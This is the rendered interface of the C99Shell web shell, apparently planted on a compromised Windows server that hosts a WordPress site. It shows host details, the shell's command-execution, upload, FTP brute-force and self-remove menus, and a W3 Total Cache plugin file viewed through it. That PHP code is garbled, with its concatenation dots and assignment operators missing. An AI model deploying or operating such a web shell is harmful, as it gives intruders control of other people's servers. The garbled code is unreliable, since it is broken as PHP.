!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Users\DMZ\Desktop\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\UI\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     DbCacheAdminView.php (937 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

if (!defined('W3TC')) {
    die();
}

w3_require_once(W3TC_LIB_W3_DIR '/UI/PluginView.php');

class 
W3_UI_DbCacheAdminView extends W3_UI_PluginView {
    
/**
     * Current page
     *
     * @var string
     */
    
var $_page 'w3tc_dbcache';


    
/**
     * Database cache tab
     *
     * @return void
     */
    
function view() {
        
$dbcache_enabled $this->_config->get_boolean('dbcache.enabled');

        include 
W3TC_INC_DIR '/options/dbcache.php';
    }

    
/**
     * Database cluster config editor
     *
     * @return void
     */
    
function dbcluster_config() {
        
$this->_page 'w3tc_dbcluster_config';
        if (
w3_is_dbcluster())
            
$content = @file_get_contents(W3TC_FILE_DB_CLUSTER_CONFIG);
        else
            
$content = @file_get_contents(W3TC_DIR '/ini/dbcluster-config-sample.php');

        include 
W3TC_INC_OPTIONS_DIR '/enterprise/dbcluster-config.php';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--